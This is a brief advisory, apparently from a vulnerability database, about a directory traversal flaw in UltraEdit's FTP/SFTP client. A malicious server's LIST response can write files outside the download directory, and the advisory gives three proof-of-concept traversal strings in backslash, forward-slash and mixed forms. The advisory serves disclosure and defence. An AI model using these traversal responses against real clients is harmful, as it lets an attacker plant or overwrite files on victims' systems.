|
UltraEdit FTP/SFTP 'LIST' Command Directory Traversal Vulnerability
An attacker can exploit this issue by enticing an unsuspecting victim to connect to a malicious server. The following proofs of concept are available: Response to LIST (backslash): \..\..\..\..\..\..\..\..\..\testfile.txt\r\n Response to LIST (forward-slash): /../../../../../../../../../testfile.txt\r\n Response to LIST (backslash and forward-slash): ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n |
|
|
Privacy Statement |
